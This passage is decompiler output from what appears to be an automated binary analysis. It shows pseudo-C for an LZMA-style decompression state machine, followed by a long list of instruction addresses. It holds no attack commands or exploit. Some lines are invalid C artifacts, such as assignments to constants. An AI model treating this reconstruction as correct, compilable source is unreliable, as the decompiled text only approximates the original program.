                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												L68:
                          												_t614 =  *(_t621 - 0x58);
                          												 *(_t621 - 0x84) = 0x12;
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t621 - 0x88) = _t542;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t621 - 0x88) = _t542;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L79;
                          											case 0x1b:
                          												L75:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t274 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t274;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t283 = __ebp - 0x64;
                          												 *_t283 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t283;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L79:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L80;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L80:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t544 = _t543 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}














                          0x00000000
                          0x00406e9d
                          0x00406e9d
                          0x00406ea1
                          0x00406ec2
                          0x00406ec9
                          0x00406ecf
                          0x00406ed5
                          0x00406ee7
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ea3
                          0x00406ea9
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x0040726d
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x004072e6
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072ec
                          0x004072e6
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
